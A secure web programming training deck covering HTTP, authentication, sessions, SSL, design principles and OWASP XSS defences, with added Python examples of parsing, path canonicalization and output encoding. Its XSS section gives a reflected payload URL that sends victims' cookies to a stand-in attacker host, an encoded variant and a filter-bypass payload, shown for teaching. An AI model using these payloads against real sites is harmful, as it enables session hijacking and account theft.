Secure Web Programming
Fred Weng <Fred.Weng@sti.com.tw>

Speaker background:
- IT background; development in C++, ASP.NET, C#
- PKI, DRM
- CMMI
- SOC (Security Operation Center)
- DLP (Data Loss Prevention)
- Certifications: CEH (Certified Ethical Hacker), CISSP (Certified Information Systems Security Professional)

Agenda:
- HTTP
- OWASP Top 10
- Others
Gartner said …
[Figure: Gartner statistics. Web Applications: 75% / 10%; Network, Server: 25% / 90%. Gartner: "2/3 …" (quotation truncated in extraction)]
Lists of compromised / defaced sites:
- Taiwan: http://www.itis.tw/compromised
- Global: Zone-h (http://www.zone-h.org/archive/published=0)
- A Web ATM site was hit! (news, label "新聞事件" = news events): http://anti-hacker.blogspot.com/search/label/%E6%96%B0%E8%81%9E%E4%BA%8B%E4%BB%B6
[Figure: Browser -> Internet -> Web Server @ DMZ -> DB Server @ Intranet. The browser sends an HTTP Request and receives an HTTP Response; the server side consists of the Web AP (application) and the OS; the response carries page content and cookies.]

HTTP
Protocol Position
  HTTP - HyperText Transfer Protocol
  RFC
  - 1945 (HTTP/1.0)
  - 2616, 2617 (HTTP/1.1, HTTP Authentication)
  - 2965 (HTTP State Management, cookies)
  Book: HTTP Essentials (2001) - Stephen Thomas
HTTP Request Format

  [Method] [URL] [Version]   (Request Line)
  [Header]: value            (Headers)
  …….
  \n                         (blank line separating headers from body)
  [Data]                     (Optional Body)
HTTP Request Format: a GET request
GET /main/index.aspx HTTP/1.1
Accept: */*
Accept-Language: zh-tw
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3; MSN OptimizedIE8;ZHTW)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.isecutech.com.tw
Pragma: no-cache
Cookie: __utma=232091143.867869796.1244101550.1249441651.1249542945.41; __utmz=232091143.1244101550.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=232091143; __utmc=232091143; ASP.NET_SessionId=b3ys5m45tfsh1i55hzhkenfw

Note the ASP.NET_SessionId cookie: it is the session identifier, so anyone who captures this request can take over the session.
HTTP Request Format: a POST request (login form)
POST /user/login.htm HTTP/1.1
Referer: https://member.ruten.com.tw:443/user/login.htm
Content-Length: 69
Content-Type: application/x-www-form-urlencoded
Host: member.ruten.com.tw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Pragma: no-cache
Cookie: __utma=1.1668397861.1187588741.1187588741.1187588741.1; __utmc=1; __utmz=1.1187588741.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=1; __utmb=1

userid=777-777-1911form%40value777.com&button=%b5n%a4J&userpass=admin

The user ID and password (userpass=admin) travel in the body as plain text; without SSL anyone on the path can read them.
HTTP Response Format

  [Version] [Status]   (Status Line)
  [Header]: value      (Headers)
  …….
  \n                   (blank line separating headers from body)
  [Data]               (Optional Body)
HTTP Response Format: a response
HTTP/1.1 200 OK
Date: Thu, 06 Aug 2009 07:20:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 119260

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Information Security ……..
………………………………………
………………………………………

The Server, X-Powered-By and X-AspNet-Version headers tell an attacker the exact server stack before a single page has been looked at.
Watching HTTP through a web proxy: Burp Suite demo ….

Request: Method
  GET
  POST        (data carried in the body)
  CONNECT     (tunnelling through a proxy)
  HEAD        (headers only, no body)
  OPTIONS     (lists the methods the server supports)
  TRACE
  PUT
  DELETE
GET
  Sample:
    GET / HTTP/1.0
    Host: www.google.com
    \n

POST
  Sample:
    POST /login.asp HTTP/1.1
    Host: www.google.com
    Content-Length: 21
    \n
    username=abc&test=123
    (the body is 21 characters, hence Content-Length: 21)

  With URL Encoding:
    POST /login.asp HTTP/1.1
    Host: www.google.com
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 33
    \n
    username=%61%62%63&test=%31%32%33
    (the encoded body is 33 characters; Content-Length counts the bytes actually sent, not the decoded value)
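The request layout on the slides above, as an added Python example (not code from the original deck): a small parser that splits a raw request into request line, headers and body, checks that Content-Length matches the body actually received, and decodes a form body; plus the reverse direction, building a POST whose Content-Length is computed from the encoded bytes. The sample request is the slide's POST re-typed with CRLF line endings; nothing here is a real library API beyond the standard library.

```python
import re
from urllib.parse import parse_qs, urlencode

# Constructed sample: the slide's URL-encoded POST, with CRLF line endings.
SAMPLE_POST = (
    b"POST /login.asp HTTP/1.1\r\n"
    b"Host: www.google.com\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 33\r\n"
    b"\r\n"
    b"username=%61%62%63&test=%31%32%33"
)

REQUEST_LINE = re.compile(rb"^([A-Z]+) (\S+) HTTP/(\d)\.(\d)$")


def parse_request(raw: bytes) -> dict:
    """Split a raw HTTP/1.x request into request line, headers and body.

    The body length is taken from Content-Length (bytes, not characters). A
    mismatch is rejected instead of guessed: request smuggling and desync
    attacks live exactly in that ambiguity.
    """
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no blank line terminating the header block")
    lines = head.split(b"\r\n")
    m = REQUEST_LINE.match(lines[0])
    if not m:
        raise ValueError("malformed request line")
    headers = {}
    for line in lines[1:]:
        name, colon, value = line.partition(b":")
        if not colon:
            raise ValueError("malformed header line: %r" % line)
        # Header names are case-insensitive; values are kept as latin-1 text.
        headers[name.strip().lower().decode("ascii")] = value.strip().decode("latin-1")
    declared = int(headers.get("content-length", "0"))
    if declared != len(body):
        raise ValueError("Content-Length %d but body is %d bytes" % (declared, len(body)))
    form = {}
    if headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        # parse_qs undoes the %XX encoding shown on the slide.
        form = {k: v[0] for k, v in parse_qs(body.decode("latin-1")).items()}
    return {
        "method": m.group(1).decode("ascii"),
        "target": m.group(2).decode("ascii"),
        "version": "%s.%s" % (m.group(3).decode("ascii"), m.group(4).decode("ascii")),
        "headers": headers,
        "body": body,
        "form": form,
    }


def build_post(host: str, path: str, fields: dict) -> bytes:
    """Serialise a form POST; Content-Length is the length of the encoded body bytes."""
    body = urlencode(fields).encode("utf-8")
    head = (
        "POST %s HTTP/1.1\r\n"
        "Host: %s\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        "Content-Length: %d\r\n"
        "\r\n" % (path, host, len(body))
    )
    return head.encode("ascii") + body
```

Running `parse_request(SAMPLE_POST)["form"]` gives `{"username": "abc", "test": "123"}`, and `build_post("www.google.com", "/login.asp", {"username": "abc", "test": "123"})` reproduces the slide's 21-byte plain form.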
HEAD
  Banner grabbing by telnet: send "HEAD / HTTP/1.0" to www.hinet.net port 80 and read the Server header in the reply.

OPTIONS
  Asks the server which methods it supports for a resource.
Headers: General
  Connection         explicitly close persistent connections
  Content-Type       MIME type of the body
  Content-Length     size of the body in bytes. Note: this header is sent for most static documents, but not for dynamically generated content
  Content-Encoding   encoding applied to the body (e.g. gzip)
  Transfer-Encoding  how the body is transferred (e.g. chunked)
Headers: for Request
  Accept              content types the client accepts
  Accept-Encoding     body encodings the client accepts
  Accept-Language     languages the client prefers
  Cookie              cookies previously set by the server
  Host                target host (IP or domain name)
  If-Modified-Since   used for caching
  Referer             page the request originated from (spelled "Referer" in the protocol)
  User-Agent          browser identification
Headers: for Response
  Date
  Server             web server software
  Location           redirect target
  WWW-Authenticate   authentication challenge
  Keep-Alive         persistent connection parameters
  Set-Cookie         sets a cookie in the browser
  X-Powered-By       application framework
  Cache-Control      caching directives
  Pragma
  Expires
Response: Status Code
  1XX   Information
  2XX   Success
  3XX   Redirection
  4XX   Client Error
  5XX   Server Error
  Reference:
    http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    http://en.wikipedia.org/wiki/List_of_HTTP_status_codes

Response: Status Code (common values)
  200 - OK
  301 - Moved Permanently (Redirect)
  302 - Moved Temporarily (Found) (Redirect)
  304 - Not Modified (for Cache)
  400 - Bad Request
  401 - Unauthorized (Authorization Required)
  403 - Forbidden
  404 - Not Found
  500 - Internal Server Error
Why?
[Slide text lost in extraction; remaining keywords: HTTP, Session, AP (application), SSL]
HTTP Authentication

  Client:  GET /test.asp HTTP/1.1
           Host: www.example.com

  Server:  HTTP/1.1 401 Authorization Required
           ………
           WWW-Authenticate: Basic

  Client:  GET /test.asp HTTP/1.1
           Host: www.example.com
           Authorization: Basic YWJjOjEyMw==

  Server:  HTTP/1.1 200 OK
           ………

  (YWJjOjEyMw== is the Base64 encoding of "abc:123")

HTTP Authentication (cont.)
  Headers
    Response
      - 401 Authorization Required
      - WWW-Authenticate: [Mech]
        [Mech] is one of:
          Basic
          Digest
          Integrated (NTLM, Kerberos)
    Request
      - Authorization: [Mech] value
Encoding (reversible, no key): Base64, HTML Encoding
  f(data): anyone can decode it, so it hides nothing.

Hash (one-way, no key): MD5, SHA1
  f(data): cannot be reversed, but the same input always gives the same output, so it can be brute-forced or looked up.

Encrypt (reversible only with the key): AES (http://www.rsa.com/rsalabs/node.asp?id=2176)
  f(data, key)
HTTP Authentication (cont.)
  Basic
    Base64 encoding of {username:password}: the password is recoverable by anyone who sees the request, so Basic must only be used over SSL.
  Digest
    Sends a hash derived from the password and a server nonce instead of the password itself; supported by IIS.
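The Basic and Digest mechanisms just described, as an added Python example (not code from the original deck). It encodes and decodes a Basic credential, showing that Base64 is reversible, and computes a Digest response the way RFC 2617 specifies for qop=auth: HA1 = MD5(user:realm:password), HA2 = MD5(method:uri), response = MD5(HA1:nonce:nc:cnonce:qop:HA2). The server-side check assumes the server stores HA1 (a realm-bound hash of the password), which is what makes Digest better than Basic on the wire and still weak at rest.

```python
import base64
import hashlib
import secrets


def basic_credential(username: str, password: str) -> str:
    """Authorization header value for Basic: base64(user:pass). Reversible, not secret."""
    token = base64.b64encode(f"{username}:{password}".encode("utf-8")).decode("ascii")
    return "Basic " + token


def parse_basic(header_value: str):
    """Decode an 'Authorization: Basic ...' value back to (username, password)."""
    scheme, _, token = header_value.partition(" ")
    if scheme.lower() != "basic":
        raise ValueError("not a Basic credential")
    decoded = base64.b64decode(token, validate=True).decode("utf-8")
    user, _, password = decoded.partition(":")   # the password may itself contain ':'
    return user, password


def md5_hex(text: str) -> str:
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def digest_response(username, realm, password, method, uri, nonce, nc, cnonce, qop="auth"):
    """Client-side Digest computation (RFC 2617, qop=auth). The password never
    crosses the wire; only this MD5 chain does."""
    ha1 = md5_hex(f"{username}:{realm}:{password}")
    ha2 = md5_hex(f"{method}:{uri}")
    return md5_hex(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")


def server_verify_digest(stored_ha1, method, uri, nonce, nc, cnonce, response, qop="auth"):
    """Server side: recompute from the stored HA1 only (no plaintext password
    needed) and compare in constant time. Note that HA1 is a static, reusable
    secret: whoever steals it can answer every future challenge."""
    ha2 = md5_hex(f"{method}:{uri}")
    expected = md5_hex(f"{stored_ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")
    return secrets.compare_digest(expected, response)
```

`parse_basic("Basic YWJjOjEyMw==")` returns `("abc", "123")`, the credential from the exchange above; fed the RFC 2617 example values (user Mufasa, realm testrealm@host.com, password "Circle Of Life"), `digest_response` reproduces the response hash printed in that RFC.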
HTTP Authentication (cont.)
  Integrated Windows Authentication: a challenge/response model
    NTLM
      - supported by IIS
      - the client (browser) must support it
    Kerberos
      - replaces NTLM (on domain-joined systems)
      - the client obtains a ticket from the Kerberos server and presents it to IIS; client and server must be in the same domain or a trusted domain.
Cookie

  Client:  GET /test.asp HTTP/1.1
           Host: www.example.com

  Server:  HTTP/1.1 200 OK
           ………
           Set-Cookie: UID=ABC

  Browser cookie table:
    Domain            Path   Name   Value
    www.example.com   /      UID    ABC

  Client (every later request to that domain and path):
           GET /test.asp HTTP/1.1
           Host: www.example.com
           Cookie: UID=ABC

Cookie
  in Response Header
    Set-Cookie: [NAME]=[VALUE]; path=[PATH]; expires=[TIME]; domain=[DOMAIN]
  in Request Header
    Cookie: [NAME1]=[VALUE1]; [NAME2]=[VALUE2] ...
  Stored on the client side (per browser)
Session

  Client:  POST /login.asp HTTP/1.1
           Host: www.example.com
           Content-Length: 24

           UID=XYZ&Password=pass932

  Server:  HTTP/1.1 200 OK
           ………
           Set-Cookie: SESSID=0002

  Browser cookie table:
    Domain            Path   Name     Value
    www.example.com   /      SESSID   0002

  Client:  GET /test.asp HTTP/1.1
           Host: www.example.com
           Cookie: SESSID=0002

  Server-side session table:
    SESSID:0001 -> UID=ABC
    SESSID:0002 -> UID=XYZ

Session
  Stored on the server side (per user); the client only carries the session identifier, in one of:
    URL Parameter
    Hidden Form Data Field
    Cookie (the usual choice)
  Typical session cookie names:
    PHPSESSID
    ASPSESSIONID
    JSESSIONID
HTTPS
  HTTP + SSL (Secure Sockets Layer)
  SSL is designed to encrypt "any" TCP/IP based network traffic

SSL Handshake + Secure Channel
  Client -> Server: ClientHello        (supported SSL/TLS versions, cipher methods, session ID, random data)
  Server -> Client: ServerHello        (chosen SSL/TLS version, cipher method, session ID, random data)
  Server -> Client: Certificate        (chain of certificates / public key)
  Server -> Client: ServerHelloDone
  Client -> Server: ClientKeyExchange  (client key material encrypted with the server's public key)
  Client -> Server: ChangeCipherSpec
  Client -> Server: Finished           (server verifies cipher/key)
  Server -> Client: ChangeCipherSpec
  Server -> Client: Finished           (client verifies cipher/key)
Gmail Login using SSL
  (screenshot)

Checking the CA in the certificate: https://atm.bank.com.tw/
  Certificate + Public Key, issued by Verisign! OK, I trust him.
  Data is then encrypted with the exchanged shared cipher key.
  http://www.study-area.org/tips/certs/certs.html

Checking the CA in the certificate: https://atm.bank.com.tw/
  Certificate + Public Key, issued by "1234 CA"! Who???

Security Warning
  The browser warns when the issuing CA is not trusted, or when the certificate's Common Name does not match the site name.

Secure = SSL?
  SSL is not a silver bullet!
  Can SSL itself be attacked? (Black Hat 2009): Moxie Marlinspike's sslsniff intercepts SSL connections
  SSL and Twitter: http://www.itis.tw/node/3355
Design Principles
  External Systems are Insecure
  Minimize Attack Surface Area
  Secure Defaults
  Least Privilege
  Separation of Duties
  Defense in Depth
  Fail Securely
  Do not trust Security through Obscurity
  Simplicity

Saltzer, J. H., and Schroeder, M. D., "The Protection of Information in Computer Systems",
Fourth ACM Symposium on Operating Systems Principles, October 1974.
External Systems are Insecure
  Every part of the HTTP Message is under the client's control, including the HTTP headers:
    Referer
    Cookie ……
  Other input channels too (RPC, Web Service, Email ….)
  DNS answers are not trustworthy either
External Systems are Insecure (cont.)
  Rule: never trust input that "arrives from outside".
  What untrusted input turns into:
    SQL Injection
    OS Command Injection
    Code Injection
    XSS Attack
    Malicious File Execution
    Insecure Direct Object Reference
External Systems are Insecure (cont.)
  Client-side JavaScript validation can always be bypassed!!!
    - Rebuild the web page
    - Use a web proxy
    - Use browser extensions (Demo ….)
    - Write a program
  Validation has to be repeated on the server!
External Systems are Insecure (cont.)
  Canonicalization: the same file name has many spellings, so compare canonical forms, never raw input
    - all of these name the same file:
        somefile.dat
        c:\temp\subdir\..\somefile.dat
        .\somefile.dat
        c%3A%5Ctemp%5Csubdir%5C%2E%2E%5Csomefile.dat   (= c:\temp\subdir\..\somefile.dat)
    - . (period) = ASCII 2E = overlong UTF-8 C0 AE = …
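The canonicalization problem above, as an added Python example (not code from the original deck): the four spellings on the slide are reduced to one canonical form before the containment check, double percent-encoding is unwound, and the overlong UTF-8 sequence C0 AE is rejected outright because Python's strict UTF-8 decoder refuses it. The base directory c:\temp is an assumption for the example; `ntpath` is used so the Windows path rules apply on any platform.

```python
import ntpath
from urllib.parse import unquote_to_bytes


def percent_decode(value: str, max_rounds: int = 3) -> str:
    """Undo percent-encoding until the string stops changing, so double-encoded
    input (%252E for '.') is fully resolved before any path check. UTF-8 is
    decoded strictly: an overlong sequence such as C0 AE for '.' raises."""
    for _ in range(max_rounds):
        try:
            decoded = unquote_to_bytes(value).decode("utf-8")
        except UnicodeDecodeError as exc:
            raise ValueError("invalid or overlong UTF-8 in path") from exc
        if decoded == value:
            return value
        value = decoded
    raise ValueError("too many layers of encoding")


def resolve_under(base_dir: str, user_path: str) -> str:
    """Canonicalise a Windows-style path supplied by the client and confirm it
    stays inside base_dir. Equivalent spellings collapse to one form first;
    only then is the containment check meaningful."""
    decoded = percent_decode(user_path)
    if "\x00" in decoded:
        raise ValueError("embedded NUL in path")
    # Relative names are taken relative to base_dir; absolute ones are kept as given.
    candidate = decoded if ntpath.isabs(decoded) else ntpath.join(base_dir, decoded)
    canonical = ntpath.normcase(ntpath.normpath(candidate))
    base = ntpath.normcase(ntpath.normpath(base_dir))
    try:
        inside = ntpath.commonpath([base, canonical]) == base
    except ValueError:          # different drive, or absolute mixed with relative
        inside = False
    if not inside:
        raise PermissionError("%r escapes %r" % (user_path, base_dir))
    return canonical
```

All four spellings from the slide resolve to `c:\temp\somefile.dat`; `..\..\windows\system32\config\sam`, `\windows\win.ini`, `/etc/passwd` and `d:\other\file` are refused, and a name containing `%C0%AE%C0%AE` is rejected as malformed encoding rather than silently treated as `..`.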
External Systems are Insecure (cont.)
  Constrain, Reject, and Sanitize Input
Minimize Attack Surface Area
  (illustrations omitted)

Minimize Attack Surface Area
  The bigger the exposed surface, the easier the target!!!
    - Slammer and CodeRed
    - SQL Injection
Minimize Attack Surface Area (cont.)
  Example: JBoss 0day (2010.4)
    A good management tool, the JMX-Console, was left reachable; its authentication could be bypassed by sending a HEAD request instead of GET.
    (http://blog.mindedsecurity.com/2010/04/good-bye-critical-jboss-0day.html)
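The configuration pattern behind that HEAD bypass, as an added illustration (not the deck's own material and not a copy of any JBoss release file): a Java EE web.xml security-constraint that lists HTTP methods only protects those methods, so a request using any other verb reaches the servlet unauthenticated. The role name and resource name are illustrative assumptions.

```xml
<!-- Weak: only GET and POST are constrained; HEAD, PUT, OPTIONS... are unauthenticated -->
<security-constraint>
  <web-resource-collection>
    <web-resource-name>HtmlAdaptor</web-resource-name>
    <url-pattern>/*</url-pattern>
    <http-method>GET</http-method>
    <http-method>POST</http-method>
  </web-resource-collection>
  <auth-constraint>
    <role-name>JBossAdmin</role-name>
  </auth-constraint>
</security-constraint>

<!-- Corrected: no <http-method> elements, so the constraint applies to every method -->
<security-constraint>
  <web-resource-collection>
    <web-resource-name>HtmlAdaptor</web-resource-name>
    <url-pattern>/*</url-pattern>
  </web-resource-collection>
  <auth-constraint>
    <role-name>JBossAdmin</role-name>
  </auth-constraint>
</security-constraint>
```

The attack-surface lesson is independent of the fix: a management console that is not needed on the Internet-facing server should be removed or bound to an administrative network, not merely password-protected.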
Secure Defaults
  The configuration as shipped must be the secure one; the user should have to opt out of protection, not opt in!
  (usability vs. security)

Least Privilege
  Run with just enough privilege to get the job done, and no more!

Separation of Duties
  One Administrator who can do everything?!
Defense in Depth - Architecture
  [Figure: layered defences. Firewall, IPS, Web AP Firewall and SSL in front of the Web Server; a second Firewall and IPSec between the Web Server and the DB Server; DLP and Anti-Virus on the hosts.]

Defense in Depth - SW Models
  [Figure: Application.exe checks security before calling Application.dll; each Application.dll checks security again before doing its work; the resource itself is secured with an ACL.]
Fail Securely

   DWORD dwRet = IsAccessAllowed(…);
   if (dwRet == ERROR_ACCESS_DENIED) {
         // Security check failed.
         // Inform user that access is denied
   } else {
         // Security check OK.
         // Perform task…
   }

  What if IsAccessAllowed() returns ERROR_NOT_ENOUGH_MEMORY? It is neither ERROR_ACCESS_DENIED nor success, and the code above performs the task.

Fail Securely (cont.)
  Do NOT: treat anything other than an explicit denial as success
  Do: test for the explicit success value, and deny in the exception handling blocks
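The fail-open bug on the previous slide, reproduced and fixed as an added Python example (not code from the original deck). `is_access_allowed` stands in for the slide's IsAccessAllowed() and can be forced to return an unexpected status or to raise; the ACL is a constructed sample.

```python
from enum import Enum
from typing import Optional, Union


class Status(Enum):
    """Return codes of the access check, in the style of the Win32 DWORD on the slide."""
    OK = 0
    ACCESS_DENIED = 5
    NOT_ENOUGH_MEMORY = 8


# Constructed sample ACL: resource -> users allowed to read it.
ACL = {"report.pdf": {"alice"}}


def is_access_allowed(user: str, resource: str,
                      simulate: Union[Status, Exception, None] = None) -> Status:
    """Stand-in for IsAccessAllowed(). `simulate` forces the error path (a status
    other than OK/ACCESS_DENIED, or an exception) the way a real check fails
    under memory pressure or when the policy store is unreachable."""
    if isinstance(simulate, Exception):
        raise simulate
    if simulate is not None:
        return simulate
    return Status.OK if user in ACL.get(resource, set()) else Status.ACCESS_DENIED


def fail_open(user: str, resource: str, simulate=None) -> bool:
    """The slide's pattern: only an explicit denial counts as 'no'."""
    ret = is_access_allowed(user, resource, simulate)
    if ret == Status.ACCESS_DENIED:
        return False          # security check failed
    return True               # BUG: NOT_ENOUGH_MEMORY (or any future code) lands here


def fail_closed(user: str, resource: str, simulate=None) -> bool:
    """Only the positive result grants access; every other outcome, including an
    exception from the check itself, is a denial."""
    try:
        return is_access_allowed(user, resource, simulate) is Status.OK
    except Exception:
        # Log it, then deny. Never let an unexpected failure fall through to 'allowed'.
        return False
```

With `simulate=Status.NOT_ENOUGH_MEMORY`, `fail_open` grants bob access to a file he is not on the ACL for, while `fail_closed` denies it; when the check raises, `fail_open` propagates the exception (an unhandled 500 at best) and `fail_closed` denies.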
Do not Trust Security through Obscurity
  "Hidden" is not "secure" ……
  Everything sent to the client (HTML source, URLs, ….) can be read by the client.

Simplicity
  Simple is Beauty!
  Design Pattern! Coding Standard!
  Code Review: easy to find security flaws
  Code Maintenance: easy to fix security flaws
  Documentation!
Web Application Vulnerabilities and Protections

OWASP (http://www.owasp.org/index.php/Main_Page)
  Open Web Application Security Project: an open community focused on web application security
  Its work is referenced by the FTC and by PCI.
  Projects: OWASP Top 10 (the most critical web application risks), WebGoat (a deliberately vulnerable training application), Enterprise Security API (ESAPI), OWASP Guide Project
OWASP Top 10: 2007 vs. 2010
(http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project)

  2007 Top 10 (Old)                                     2010 Top 10 (New)
  A1. Cross-Site Scripting (XSS)                        A1. Injection
  A2. Injection Flaws                                   A2. Cross-Site Scripting (XSS)
  A3. Malicious File Execution                          A3. Broken Authentication and Session Management
  A4. Insecure Direct Object Reference                  A4. Insecure Direct Object References
  A5. Cross-Site Request Forgery (CSRF)                 A5. Cross-Site Request Forgery (CSRF)
  A6. Information Leakage and Improper Error Handling   A6. Security Misconfiguration (new)
  A7. Broken Authentication and Session Management      A7. Insecure Cryptographic Storage
  A8. Insecure Cryptographic Storage                    A8. Failure to Restrict URL Access
  A9. Insecure Communication                            A9. Insufficient Transport Layer Protection
  A10. Failure to Restrict URL Access                   A10. Unvalidated Redirects and Forwards (new)
OWASP Top 10 (2007) - 1: Cross-Site Scripting
  Sometimes abbreviated CSS; XSS is used to avoid confusion with Cascading Style Sheets
  How it works:
    - the attacker gets script into a page served by a site the victim trusts
    - the victim's browser runs that script with the site's privileges (cookies, session)

XSS: a vulnerable page!
  (screenshot)

The code behind it (classic ASP), vulnerable to XSS!

  <%
   ...
   Response.Write "<div class='label'></div><br />"
   Response.Write ": " & Request.Form("SearchKeyWord")
   ...
  %>

  The form field is written straight into the page, so whatever the client sent becomes part of the HTML.
XSS (cont.)
  (screenshot)

XSS:
  (screenshot)
A real XSS example
  Reflected through the search parameter in the URL:
  http://www.wretch.cc/blog/blog.php?id=VIPBlog&search=<script>alert(document.cookie)</script>&search_title=1

  Stealing the cookie instead of displaying it:
  http://www.wretch.cc/blog/blog.php?id=VIPBlog&search=<script>location.replace("http://www.evilhost.com/getcookie.asp?k="+document.cookie)</script>&search_title=1

  The same payload hex-encoded and built with String.fromCharCode, so nothing suspicious is visible in the link:
  http://www.wretch.cc/blog/blog.php?id=VIPBlog&search=%3C%73%63%72%69%70%74%3E%6C%6F%63%61%74%69%6F%6E%2E%72%65%70%6C%61%63%65%28%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%31%30%34%2C%31%31%36…( )&search_title=1

  A blog reader who clicks the link /_\ … sends their cookie to the attacker.
Stolen cookie
  (screenshot)

Who is responsible?
  (http://anti-hacker.blogspot.com/2009/08/sorry.html)

YouTube ?!
  (screenshot)

XSS Shell
  (screenshots: a JavaScript backdoor that keeps the victim's browser under the attacker's control)

XSS Worm
  2005: Samy Worm on MySpace
    - each viewer's profile got "Samy is my hero" added, together with a copy of the worm
    - 2005-10-04: over one million friend requests in about 20 hours
  2007:
    (example lost in extraction)
Input filtering + a blacklist is not enough!
  Blacklist filtering in classic ASP:

    set Reg = new RegExp
    with Reg
       .Pattern = "['""#:;()<>,=+ ]"
       .Global = True
    end with
    test = Reg.Replace( Request.QueryString("test") , "" )

  What about <<script>>… ?! or <scr<script>ipt> ….?! A filter that deletes the string <script> once reassembles the tag from the pieces it leaves behind.
  Does the blacklist really cover everything?
(cont.)
  .NET 1.1 added request validation, which rejects input such as <script>alert("hello!")</script> ….
  It can be switched off per page, or in web.config, and it only catches the patterns Microsoft anticipated.
(cont.)
  Output: Sanitization (encode on output)
    Encode "everything" that came from outside!!!
    - Text placed in HTML: HTML-Encoding
      PHP: ensure output is passed through htmlentities() or htmlspecialchars()
    - Text placed in a URL: URL-Encoding, e.g. HttpUtility.UrlEncode()
(cont.)
.NET example:

  <script runat="server">
  void searchBtn_Click(object sender, EventArgs e) {
      Response.Write(HttpUtility.HtmlEncode(inputTxt.Text)); }
  </script>
  <html>
  <body>
  <form id="form1" runat="server">
  <asp:TextBox ID="inputTxt" Runat="server" TextMode="MultiLine"
     Width="382px" Height="152px">
  </asp:TextBox>
  <asp:Button ID="searchBtn" Runat="server" Text="Submit" OnClick="searchBtn_Click" />
  </form>
  </body>
  </html>
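The blacklist bypass (<scr<script>ipt>) and the output-encoding fix from the slides above, as an added Python example (not code from the original deck). It reimplements the naive "delete <script>" filter, shows the nested payload surviving it, shows that looping the filter still misses an <img onerror=...> payload, and then applies context-specific output encoding for the HTML body, an attribute, and a URL parameter. The search page markup is illustrative.

```python
import html
import re
from urllib.parse import quote

SCRIPT_TAG = re.compile(r"</?script>", re.IGNORECASE)


def strip_script_tags(value: str) -> str:
    """Blacklist filter in the spirit of the slide's RegExp: delete every literal
    <script> and </script>. The attacker nests one tag inside another so that
    the deletion itself assembles the payload."""
    return SCRIPT_TAG.sub("", value)


def strip_until_stable(value: str) -> str:
    """Looping until nothing changes closes the nesting hole, but the blacklist
    still knows nothing about <img onerror=...>, <svg onload=...>, javascript:
    URLs or attribute-context breakouts. It is the wrong tool."""
    while True:
        stripped = SCRIPT_TAG.sub("", value)
        if stripped == value:
            return value
        value = stripped


def render_search_result(keyword: str) -> str:
    """Output encoding for the HTML body context (the slide's Response.Write case):
    the input is kept intact, but < > & " ' can no longer be markup."""
    return "<div class='label'>Search keyword:</div><br />" + html.escape(keyword)


def render_link(keyword: str) -> str:
    """The same value placed in an attribute (quote=True) and in a URL query
    parameter (percent-encoding): each context gets the encoder that matches it."""
    return '<a href="/search?q=%s" title="%s">search again</a>' % (
        quote(keyword, safe=""), html.escape(keyword, quote=True))
```

For the payload `<scr<script>ipt>alert(document.cookie)</scr</script>ipt>`, `strip_script_tags` returns exactly `<script>alert(document.cookie)</script>`; `render_search_result` returns it as `&lt;scr&lt;script&gt;...`, which the browser displays and never executes.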
(cont.)
  Framework support
  - .NET
    Microsoft Anti-Cross Site Scripting Library V1.5 (MSDN)
    (http://www.microsoft.com/downloads/details.aspx?FamilyID=efb9c819-53ff-4f82-bfaf-e11625130c25&DisplayLang=en)
  - JAVA:
    DeXSS -- Java program for removing JavaScript from HTML (http://software.graflex.org/dexss)
    OWASP Stinger Project (a Java EE validation filter) (http://www.owasp.org/index.php/Category:OWASP_Stinger_Project)
    How to Build an HTTP Request Validation Engine for Your J2EE Application (http://www.owasp.org/index.php/How_to_Build_an_HTTP_Request_Validation_Engine_for_Your_J2EE_Application)
(cont.)
MS Anti-XSS Library example:

  using System;
  using Microsoft.Security.Application;

  public partial class _Default : System.Web.UI.Page
  {
      protected void Button1_Click(object sender, EventArgs e)
      {
          String Input = TextBox1.Text;

          //Encode untrusted input and write output
          Response.Write(AntiXss.HtmlEncode(Input));
      }
  }

  Microsoft Anti-Cross Site Scripting Library
  http://blog.miniasp.com/post/2009/07/Recommand-Microsoft-Anti-Cross-Site-Scripting-Library-V30.aspx
(cont.)
  - OWASP
    OWASP Enterprise Security API (ESAPI Project)
    (http://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API#tab=About)
    Supported languages:
      Java EE
      .NET
      Classic ASP
      PHP
      ColdFusion & CFML
      Python
      Haskell
(cont.)
  Declare the character set of the HTTP response explicitly (ISO-8859-1 or UTF-8), so the browser cannot be tricked into interpreting the page in an encoding the filter did not expect
  - Content-Type: text/html; charset=ISO-8859-1
  - For .NET: set it in web.config, or as a per-page setting
XSS - DOM Based XSS
  Type 1: Non-persistent / Reflected
  Type 2: Persistent / Stored
  Type 3: DOM Based XSS: the page's own script reads attacker-controlled DOM values and writes them into the page, so the server never sees the payload
    - document.location
    - document.URL
    - document.referrer

  (screenshots)

(cont.)
  Sources: DOM properties the script reads
    document.URL, document.URLUnencoded, document.location, document.referrer, window.location ….
  Sinks: DOM operations that render or execute the value
    document.write(…), document.writeln(…), document.body.innerHTML=…, document.forms[0].action=…,
    document.attachEvent(…), document.create…(…), document.execCommand(…), document.body. …,
    window.attachEvent(…), document.location.hostname=…, document.location.replace(…),
